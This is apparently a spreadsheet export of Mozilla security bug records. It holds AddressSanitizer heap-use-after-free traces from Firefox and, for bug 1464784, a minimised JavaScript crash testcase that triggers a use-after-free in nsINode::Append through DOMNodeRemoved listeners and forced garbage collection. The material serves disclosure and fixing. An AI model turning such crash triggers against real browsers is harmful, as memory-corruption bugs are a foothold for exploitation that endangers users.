==2410== ERROR: AddressSanitizer heap-use-after-free on address 0x7f19a99a1280 at pc 0x7f19d6751fef bp 0x7fff085f3390 sp 0x7fff085f3388
READ of size 8 at 0x7f19a99a1280 thread T0
    #0 0x7f19d6751fef in nsHTMLSelectElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLSelectElement.cpp:1747
    #1 0x7f19d6752c9f in non-virtual thunk to nsHTMLSelectElement::SubmitNamesValues(nsFormSubmission*) asn1cmn.c:0
    #2 0x7f19d635feb2 in nsHTMLFormElement::WalkFormElements(nsFormSubmission*) src/content/html/content/src/nsHTMLFormElement.cpp:983
    #3 0x7f19d635be9a in nsHTMLFormElement::BuildSubmission(nsFormSubmission**, nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:772
    #4 0x7f19d635ab79 in nsHTMLFormElement::DoSubmit(nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:706
    #5 0x7f19d6353d19 in nsHTMLFormElement::DoSubmitOrReset(nsEvent*, int) src/content/html/content/src/nsHTMLFormElement.cpp:657
    #6 0x7f19d635360b in nsHTMLFormElement::Submit() src/content/html/content/src/nsHTMLFormElement.cpp:391
    #7 0x7f19d635400c in non-virtual thunk to nsHTMLFormElement::Submit() asn1cmn.c:0
    #8 0x7f19da2aa1b1 in nsIDOMHTMLFormElement_Submit(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:14382
    #9 0x7f19e5566587 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:382
    #10 0x7f19e54dd593 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2426
    #11 0x7f19e5464725 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #12 0x7f19e55669a9 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:356
    #13 0x7f19e4e9c430 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #14 0x7f19e556bb0d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #15 0x7f19e4d470d9 in JS_CallFunctionValue src/js/src/jsapi.cpp:5572
    #16 0x7f19d7225bf5 in nsJSContext::CallEventHandler(nsISupports*, JSObject*, JSObject*, nsIArray*, nsIVariant**) src/dom/base/nsJSEnvironment.cpp:1891
    #17 0x7f19d79c6ca6 in nsJSEventListener::HandleEvent(nsIDOMEvent*) src/dom/src/events/nsJSEventListener.cpp:188
    #18 0x7f19d5e24bb3 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:794
    #19 0x7f19d5e2607a in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:867
    #20 0x7f19d5fd4c97 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.h:144
    #21 0x7f19d5fc3936 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:185
    #22 0x7f19d5fc149c in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:313
    #23 0x7f19d5fc6fb0 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) src/content/events/src/nsEventDispatcher.cpp:634
    #24 0x7f19d367419f in DocumentViewerImpl::LoadComplete(unsigned int) src/layout/base/nsDocumentViewer.cpp:1017
    #25 0x7f19db0e5dd8 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) src/docshell/base/nsDocShell.cpp:6294
    #26 0x7f19db0ddae1 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) src/docshell/base/nsDocShell.cpp:6125
    #27 0x7f19db0decd5 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) asn1cmn.c:0
    #28 0x7f19db1e4fd4 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, unsigned int) src/uriloader/base/nsDocLoader.cpp:1352
    #29 0x7f19db1e29e5 in nsDocLoader::doStopDocumentLoad(nsIRequest*, unsigned int) src/uriloader/base/nsDocLoader.cpp:930
    #30 0x7f19db1dbc38 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:822
    #31 0x7f19db1e01bc in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) src/uriloader/base/nsDocLoader.cpp:704
    #32 0x7f19db1e1d0d in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) asn1cmn.c:0
    #33 0x7f19d2042e89 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, unsigned int) src/netwerk/base/src/nsLoadGroup.cpp:698
    #34 0x7f19d510bd94 in nsDocument::DoUnblockOnload() src/content/base/src/nsDocument.cpp:7189
    #35 0x7f19d510b821 in nsDocument::UnblockOnload(bool) src/content/base/src/nsDocument.cpp:7132
    #36 0x7f19d701ed84 in nsBindingManager::DoProcessAttachedQueue() src/content/xbl/src/nsBindingManager.cpp:990
    #37 0x7f19d70390f9 in nsRunnableMethodImpl&lt;void (nsBindingManager::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:349
    #38 0x7f19de8eb8fd in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #39 0x7f19de57a6ad in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #40 0x7f19dd519ce6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #41 0x7f19deb9db9a in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
    #42 0x7f19deb9d9e3 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:202
    #43 0x7f19deb9d8c8 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:176
    #44 0x7f19dca23c8e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #45 0x7f19db676eb8 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:257
    #46 0x7f19d1e04d20 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3787
    #47 0x7f19d1e0b6c2 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3864
    #48 0x7f19d1e0eb92 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3940
    #49 0x40c28f in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:160
    #50 0x409cbd in main src/browser/app/nsBrowserApp.cpp:298
    #51 0x7f19ee9c3c4d in ?? ??:0
0x7f19a99a1280 is located 0 bytes inside of 232-byte region [0x7f19a99a1280,0x7f19a99a1368)
freed by thread T0 here:
    #0 0x4a4392 in free ??:0
    #1 0x7f19eb84f5c3 in moz_free src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f19d6720436 in ~nsHTMLSelectElement src/content/html/content/src/nsHTMLSelectElement.cpp:134
    #3 0x7f19d541237d in nsNodeUtils::LastRelease(nsINode*) src/content/base/src/nsNodeUtils.cpp:252
    #4 0x7f19d52e8e4f in nsGenericElement::Release() src/content/base/src/nsGenericElement.cpp:3509
    #5 0x7f19d6721884 in nsHTMLSelectElement::Release() src/content/html/content/src/nsHTMLSelectElement.cpp:146
    #6 0x7f19de57d1db in nsXPCOMCycleCollectionParticipant::UnrootImpl(void*) src/objdir-ff-asan-sym/xpcom/build/nsCycleCollectionParticipant.cpp:37
    #7 0x7f19de9a21ec in nsCycleCollector::CollectWhite(nsICycleCollectorListener*) src/xpcom/base/nsCycleCollector.cpp:2305
    #8 0x7f19de9a9ef6 in nsCycleCollector::FinishCollection(nsICycleCollectorListener*) src/xpcom/base/nsCycleCollector.cpp:2845
    #9 0x7f19de9af388 in nsCycleCollectorRunner::Collect(bool, nsCycleCollectorResults*, nsICycleCollectorListener*) src/xpcom/base/nsCycleCollector.cpp:3147
    #10 0x7f19de9ae095 in nsCycleCollector_collect(bool, nsCycleCollectorResults*, nsICycleCollectorListener*) src/xpcom/base/nsCycleCollector.cpp:3236
    #11 0x7f19d72017f5 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int, bool) src/dom/base/nsJSEnvironment.cpp:3072
    #12 0x7f19d72463f2 in CCTimerFired(nsITimer*, void*) src/dom/base/nsJSEnvironment.cpp:3263
    #13 0x7f19de927692 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:474
    #14 0x7f19de9292cc in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:558
    #15 0x7f19de8eb8fd in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #16 0x7f19de57a6ad in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #17 0x7f19db58e826 in nsXULWindow::ShowModal() src/xpfe/appshell/src/nsXULWindow.cpp:378
    #18 0x7f19db571732 in nsContentTreeOwner::ShowAsModal() src/xpfe/appshell/src/nsContentTreeOwner.cpp:529
    #19 0x7f19db5718ac in non-virtual thunk to nsContentTreeOwner::ShowAsModal() asn1cmn.c:0
    #20 0x7f19db39a4eb in nsWindowWatcher::OpenWindowJSInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, nsIArray*, bool, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:996
    #21 0x7f19db390b71 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:381
    #22 0x7f19dc80e8b1 in nsNSSDialogHelper::openDialog(nsIDOMWindow*, char const*, nsISupports*, bool) src/security/manager/pki/src/nsNSSDialogHelper.cpp:44
    #23 0x7f19dc7f391b in nsNSSDialogs::DisplayGeneratingKeypairInfo(nsIInterfaceRequestor*, nsIKeygenThread*) src/security/manager/pki/src/nsNSSDialogs.cpp:457
    #24 0x7f19dc7f3af7 in non-virtual thunk to nsNSSDialogs::DisplayGeneratingKeypairInfo(nsIInterfaceRequestor*, nsIKeygenThread*) asn1cmn.c:0
    #25 0x7f19dba35f05 in nsKeygenFormProcessor::GetPublicKey(nsAString_internal&amp;, nsAString_internal&amp;, nsString&amp;, nsAString_internal&amp;, nsAString_internal&amp;) src/security/manager/ssl/src/nsKeygenHandler.cpp:658
    #26 0x7f19dba3a053 in nsKeygenFormProcessor::ProcessValue(nsIDOMHTMLElement*, nsAString_internal const&amp;, nsAString_internal&amp;) src/security/manager/ssl/src/nsKeygenHandler.cpp:800
    #27 0x7f19d675196e in nsHTMLSelectElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLSelectElement.cpp:1771
    #28 0x7f19d6752c9f in non-virtual thunk to nsHTMLSelectElement::SubmitNamesValues(nsFormSubmission*) asn1cmn.c:0
    #29 0x7f19d635feb2 in nsHTMLFormElement::WalkFormElements(nsFormSubmission*) src/content/html/content/src/nsHTMLFormElement.cpp:983
previously allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f19eb84f717 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f19d671ecd9 in NS_NewHTMLSelectElement(already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/content/src/nsHTMLSelectElement.cpp:104
    #3 0x7f19d69f70ce in CreateHTMLElement(unsigned int, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:497
    #4 0x7f19d69f7990 in NS_NewHTMLElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/html/document/src/nsHTMLContentSink.cpp:480
    #5 0x7f19d53e3978 in NS_NewElement(nsIContent**, already_AddRefed&lt;nsINodeInfo&gt;, mozilla::dom::FromParser) src/content/base/src/nsNameSpaceManager.cpp:201
    #6 0x7f19d84a2b55 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) src/parser/html/nsHtml5TreeOperation.cpp:340
    #7 0x7f19d84c3806 in nsHtml5TreeOpExecutor::RunFlushLoop() src/parser/html/nsHtml5TreeOpExecutor.cpp:566
    #8 0x7f19d84ff746 in nsHtml5ExecutorFlusher::Run() src/parser/html/nsHtml5StreamParser.cpp:127
    #9 0x7f19de8eb8fd in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #10 0x7f19de57a6ad in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #11 0x7f19dd519ce6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #12 0x7f19deb9db9a in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
    #13 0x7f19deb9d9e3 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:202
    #14 0x7f19deb9d8c8 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:176
    #15 0x7f19dca23c8e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #16 0x7f19db676eb8 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:257
    #17 0x7f19d1e04d20 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3787
    #18 0x7f19d1e0b6c2 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3864
    #19 0x7f19d1e0eb92 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3940
    #20 0x40c28f in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:160
    #21 0x409cbd in main src/browser/app/nsBrowserApp.cpp:298
    #22 0x7f19ee9c3c4d in ?? ??:0
==2410== ABORTING
Stats: 222M malloced (260M for red zones) by 614296 calls
Stats: 50M realloced by 30116 calls
Stats: 191M freed by 382570 calls
Stats: 58M really freed by 173153 calls
Stats: 464M (118841 full pages) mmaped in 116 calls
  mmaps   by size class: 8:425958; 9:57337; 10:65520; 11:20470; 12:4096; 13:3072; 14:1536; 15:384; 16:640; 17:160; 18:224; 19:48; 20:12;
  mallocs by size class: 8:452010; 9:59723; 10:72170; 11:20208; 12:3653; 13:3340; 14:1706; 15:411; 16:629; 17:148; 18:238; 19:47; 20:13;
  frees   by size class: 8:237578; 9:50565; 10:68846; 11:17073; 12:2672; 13:3053; 14:1487; 15:360; 16:531; 17:134; 18:218; 19:43; 20:10;
  rfrees  by size class: 8:129647; 9:23124; 10:8778; 11:8941; 12:816; 13:545; 14:723; 15:159; 16:342; 17:52; 18:21; 19:4; 20:1;
Stats: malloc large: 446 small slow: 2990
Shadow byte and word:
  0x1fe335334250: fd
  0x1fe335334250: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe335334230: fa fa fa fa fa fa fa fa
  0x1fe335334238: fa fa fa fa fa fa fa fa
  0x1fe335334240: fa fa fa fa fa fa fa fa
  0x1fe335334248: fa fa fa fa fa fa fa fa
=&gt;0x1fe335334250: fd fd fd fd fd fd fd fd
  0x1fe335334258: fd fd fd fd fd fd fd fd
  0x1fe335334260: fd fd fd fd fd fd fd fd
  0x1fe335334268: fd fd fd fd fd fd fd fd
  0x1fe335334270: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X5589" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5590">
      <c r="A5590" t="n">
        <v>1464784</v>
      </c>
      <c r="B5590" t="inlineStr">
        <is>
          <t>2018-05-28 01:47:28 -0700</t>
        </is>
      </c>
      <c r="C5590" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsINode::Append</t>
        </is>
      </c>
      <c r="D5590" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:23 -0700</t>
        </is>
      </c>
      <c r="E5590" t="n">
        <v>1</v>
      </c>
      <c r="F5590" t="n">
        <v>1</v>
      </c>
      <c r="G5590" t="n">
        <v>3</v>
      </c>
      <c r="H5590" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5590" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5590" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5590" t="inlineStr">
        <is>
          <t>62 Branch</t>
        </is>
      </c>
      <c r="L5590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5590" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5590" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5590" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5590" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5590" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T5590" t="n">
        <v>1</v>
      </c>
      <c r="U5590" t="n">
        <v>0</v>
      </c>
      <c r="V5590" t="n">
        <v>18</v>
      </c>
      <c r="W5590" t="inlineStr">
        <is>
          <t>Created attachment 8981095
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 62.0a1 (SourceStamp=043e4ab6e72469ed8121f4da98dcdfef983a49d9). It requires a fuzzing build (--enable-fuzzing) and the pref fuzzing.enabled=true
&lt;script&gt;
function start() {
	o13=(new DOMParser()).parseFromString("&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;s&gt;&lt;/s&gt;&lt;/html&gt;",'text/html');
	o17=o13.all[3];
	o54=(new DOMParser()).parseFromString("&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;input&gt;&lt;/input&gt;&lt;/html&gt;",'text/html');
	o58=o54.all[3];
	o60=(new DOMParser()).parseFromString("&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;li&gt;&lt;/li&gt;&lt;/html&gt;",'text/html');
	o61=o60.all[0];
	o66=(new DOMParser()).parseFromString("&lt;html xmlns='http://www.w3.org/1999/xhtml'&gt;&lt;tbody&gt;&lt;/tbody&gt;&lt;/html&gt;",'text/html');
	o17.addEventListener('DOMNodeRemoved',fun0);
	try{o72=o66.prepend(o61,undefined);}catch(e){}
	o77=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o61.appendChild(o77);
	o79=o77.cloneNode(true);
	document.documentElement.append(o17);
}
var count = 0;
function fun0() {
	count++;
	if(count==1) {
		o79.append(o58,o17,undefined);
	} else if(count==2) {
		document.documentElement.prepend(o79);
		o149=o58.parentNode;
		document.documentElement.append(o149);
	        document.documentElement.prepend(o17,undefined);
		o149=null;o58=null;o17=null;o79=null;o66=null;o13=null;o54=null;o60=null;o77=null;
		FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
	} else if(count==4) {
		 document.documentElement.prepend(undefined,o61);
	}
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==12349==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d0002671c8 at pc 0x7fcb7cf962d0 bp 0x7ffc143ad2b0 sp 0x7ffc143ad2a8
READ of size 8 at 0x61d0002671c8 thread T0 (file:// Content)
    #0 0x7fcb7cf962cf in CreateTextNode /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5763:44
    #1 0x7fcb7cf962cf in GetNodeFromNodeOrString(mozilla::dom::OwningNodeOrString const&amp;, nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1429
    #2 0x7fcb7cf59ac2 in ConvertNodesOrStringsIntoNode(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, nsIDocument*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1453:35
    #3 0x7fcb7cf5ac33 in nsINode::Append(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1638:5
    #4 0x7fcb7ec79dd6 in mozilla::dom::ElementBinding::append(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:5175:9
    #5 0x7fcb7f381b81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3280:13
    #6 0x7fcb85c4c157 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #7 0x7fcb85c4c157 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468
    #8 0x7fcb85c36fa5 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:12
    #9 0x7fcb85c36fa5 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #10 0x7fcb85c1d4c6 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:418:12
    #11 0x7fcb85c4bed5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:490:15
    #12 0x7fcb85c4d152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:536:10
    #13 0x7fcb86794a5a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2981:12
    #14 0x7fcb7eb2ed05 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:51:8
    #15 0x7fcb7faaa64e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #16 0x7fcb7faaa64e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1121
    #17 0x7fcb7faabddb in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1291:20
    #18 0x7fcb7fa960e7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:528:16
    #19 0x7fcb7fa99ee3 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:961:9
    #20 0x7fcb7cab1cc2 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4776:5
    #21 0x7fcb7cf5bc71 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1926:7
    #22 0x7fcb7cf5ac5f in InsertBefore /builds/worker/workspace/build/src/dom/base/nsINode.h:1847:12
    #23 0x7fcb7cf5ac5f in AppendChild /builds/worker/workspace/build/src/dom/base/nsINode.h:1851
    #24 0x7fcb7cf5ac5f in nsINode::Append(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1643
    #25 0x7fcb7ec79dd6 in mozilla::dom::ElementBinding::append(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:5175:9
    #26 0x7fcb7f381b81 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3280:13
    #27 0x7fcb85c4c157 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #28 0x7fcb85c4c157 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468
    #29 0x7fcb85c36fa5 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:12
    #30 0x7fcb85c36fa5 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #31 0x7fcb85c1d4c6 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:418:12
    #32 0x7fcb85c4bed5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:490:15
    #33 0x7fcb85c4d152 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:536:10
    #34 0x7fcb86794a5a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2981:12
    #35 0x7fcb7eb298be in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #36 0x7fcb7fae611a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JSCompartment*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #37 0x7fcb7fae3a84 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #38 0x7fcb7faaa69d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1124:52
    #39 0x7fcb7faabddb in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1291:20
